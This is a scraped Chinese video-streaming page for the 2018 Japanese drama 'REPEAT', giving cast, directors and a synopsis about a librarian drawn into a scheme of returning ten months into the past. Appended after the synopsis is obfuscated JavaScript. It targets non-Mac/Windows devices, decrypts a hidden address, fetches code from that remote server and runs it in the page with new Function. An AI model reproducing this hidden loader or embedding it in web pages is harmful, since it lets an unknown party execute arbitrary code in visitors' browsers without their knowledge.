REPEAT~改变命运的10个月~

主演:贯地谷栞  本乡奏多  安达祐实  照屋年之  岛崎遥香  六角精儿  松田悟志  手塚理美  酒井敏也  

导演:藏方政俊  汤浅弘章  片桐健滋  

类型:日韩剧

备注:完结   更新时间:2022-09-01 12:40

地区:日本   年份:2018

播放线路
快手云 无尽云
详细介绍

「一小时后的6点45分将发生地震。」图书馆管理员筱崎鲇美(贯地谷诗穗梨饰)接到了一通神秘来电。原以为这只不过是恶作剧,但挂掉电话的一小时后,这个神秘的预言却应验了。这时神秘男人再次来电,他自称为「风间」,为了改变命运,他从未来回到了过去,所以未来的事他都知道。 「风间」将这个时空穿越称之为「REPEAT」,并邀请鲇美成为自己的客人。   通过「REPEAT」,人们能回到10个月前。在10个月前,操纵大家所不知道的“未来记忆”,以回避失败或赚取金钱。除了鲇美,参加「REPEAT」的还有夜总会服务员--毛利圭介(本乡奏多饰),咖啡厅老板天童太郎(ゴリ饰)等8位男女。这八位男女都分别怀抱对过去的懊悔。而该剧的三位主人公则为了得到选择幸福人生的第二次机会而决定进行「REPEAT」。然而,「REPEAT」成员却接二连三地发生了危险的事情……

window['LxQRgj'] = function(){ var keyList = [ "+ALPvZG7JfqnVawkUTN58jgMsm0rulh-4umApW61xS8HnhKIkab3rYoDiwtUvPec" , "QIoM7N6OP2En01qimF8flCU9V+RkwHAE4aqnTc6I9QS7lYsrv+ePONH3ZmtkBF", "jZ+3nV6wxsbgyWiolMdqDhtackJHC2r0eLGz5KQAfFtkN2oyg+paL9zSH.:bXV8IAsleMrKdhYBRimUOCx6/", "-zwgpiskFb9YlOT0Dx1KJuRhZW02ma9f3eR745c6-H8gVXIMjO", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"-A88hV0f-8kv0")], crd = x(keyList[1],"6mQoNQQ1QRQ7N"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("ijjxWlFFsxhodHZs2WbJ66odVy", "YTz9Y9iilYxwwkz9xY", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}